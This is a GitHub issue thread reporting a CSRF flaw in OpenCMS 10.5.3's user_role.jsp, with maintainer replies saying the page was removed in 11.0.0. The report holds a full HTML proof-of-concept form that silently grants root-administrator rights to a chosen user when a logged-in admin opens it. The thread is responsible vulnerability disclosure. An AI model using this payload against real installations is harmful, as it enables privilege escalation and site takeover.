Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross Site Request Forgery Vulnerability in OpenCMS 10.5.3 #586

Closed
MrR3boot opened this issue Mar 20, 2018 · 8 comments
Closed

Cross Site Request Forgery Vulnerability in OpenCMS 10.5.3 #586

MrR3boot opened this issue Mar 20, 2018 · 8 comments

Comments

@MrR3boot
Copy link

Hi Team, I would like to report Multiple CSRF vulnerability in latest version. mitre.org assigned new CVE for this vulnerabiliity.

Description:

Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.

Steps to Reproduce:

  1. Send below crafted request to logged in user who is having Root Administrator level access.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
      <input type="hidden" name="dialogtype" value="" />
      <input type="hidden" name="root" value="" />
      <input type="hidden" name="sortcol" value="" />
      <input type="hidden" name="preactiondone" value="" />
      <input type="hidden" name="oufqn" value="" />
      <input type="hidden" name="resource" value="" />
      <input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
      <input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
      <input type="hidden" name="framename" value="" />
      <input type="hidden" name="ispopup" value="" />
      <input type="hidden" name="originalparams" value="" />
      <input type="hidden" name="message" value="" />
      <input type="hidden" name="selitems" value="RoleRootAdmins" />
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="style" value="new" />
      <input type="hidden" name="page" value="" />
      <input type="hidden" name="base" value="" />
      <input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
      <input type="hidden" name="action" value="listmultiaction" />
      <input type="hidden" name="searchfilter" value="" />
      <input type="hidden" name="redirect" value="" />
      <input type="hidden" name="force" value="" />
      <input type="hidden" name="formname" value="lsre&#45;form" />
      <input type="hidden" name="listaction" value="ma" />
      <input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.

Fix:

Implementation of random token in every state changing request will mitigate the issue.

Affected Version:

10.5.3 release

@MrR3boot
Copy link
Author

Any update on reported issue

@tHerrmann
Copy link

Hi, we are looking into this and will fix the issue with our next maintenance release.

@MrR3boot
Copy link
Author

Thanks for the response. I will wait for the updated release. Kindly mention my details in new release.

Name : Sureshbabu Narvaneni
Mail : narvaneni.suresh@gmail.com

@MrR3boot
Copy link
Author

Hi, Can i get exact ETA for this fix.

@veggie4ever
Copy link

Hi Team,
any update on this issue?
Best regards
Kai

@veggie4ever
Copy link

Hi @tHerrmann,
any news on this? The issue is more than two years old. Is this fixed in version 11.x?
Best regards
Kai

@tHerrmann
Copy link

Hi Kai,
the mentioned JSP is no longer present in OpenCms since 11.0.0. So this should be resolved.
@gWestenberger, would you like to close this issue?

@etruta
Copy link

etruta commented May 26, 2021

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants